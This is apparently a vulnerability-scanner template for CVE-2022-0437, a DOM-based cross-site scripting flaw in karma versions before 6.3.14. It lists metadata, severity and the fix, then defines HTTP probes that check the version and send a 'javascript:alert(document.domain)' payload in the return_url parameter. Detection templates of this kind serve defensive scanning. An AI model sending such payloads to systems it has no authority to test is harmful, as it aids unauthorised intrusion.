id: CVE-2022-0437
info:
name: karma-runner DOM-based Cross-Site Scripting
author: pikpikcu
severity: medium
description: NPM karma prior to 6.3.14. contains a DOM-based cross-site Scripting vulnerability.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.
remediation: |
Upgrade to the latest version of karma-runner that includes proper input sanitization to mitigate this vulnerability.
reference:
- https://huntr.dev/bounties/64b67ea1-5487-4382-a5f6-e8a95f798885
- https://github.com/karma-runner/karma/commit/839578c45a8ac42fbc1d72105f97eab77dd3eb8a
- https://nvd.nist.gov/vuln/detail/CVE-2022-0437
- https://github.com/karma-runner/karma
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-0437
cwe-id: CWE-79
epss-score: 0.001
epss-percentile: 0.40832
cpe: cpe:2.3:a:karma_project:karma:*:*:*:*:*:node.js:*:*
metadata:
max-request: 2
vendor: karma_project
product: karma
framework: node.js
tags: cve2022,cve,oss,huntr,karma,xss,karma_project,node.js
http:
- method: GET
path:
- '{{BaseURL}}/karma.js'
- '{{BaseURL}}/?return_url=javascript:alert(document.domain)'
matchers-condition: and
matchers:
- type: dsl
dsl:
- compare_versions(version, '< 6.3.14')
- type: word
part: body_2
words:
- 'Karma'
- type: status
status:
- 200
extractors:
- type: regex
name: version
group: 1
regex:
- "(?m)VERSION: '([0-9.]+)'"
internal: true
# digest: 490a00463044022045da5c36fcf95d76d11cdc23a61d80ffd633cccbdf75ff6ae59b6182c47263fc022013144ed32ad39f0826140953867a536d90f76c5cfb05361967be396ab1d89268:922c64590222798bb761d5b6d8e72950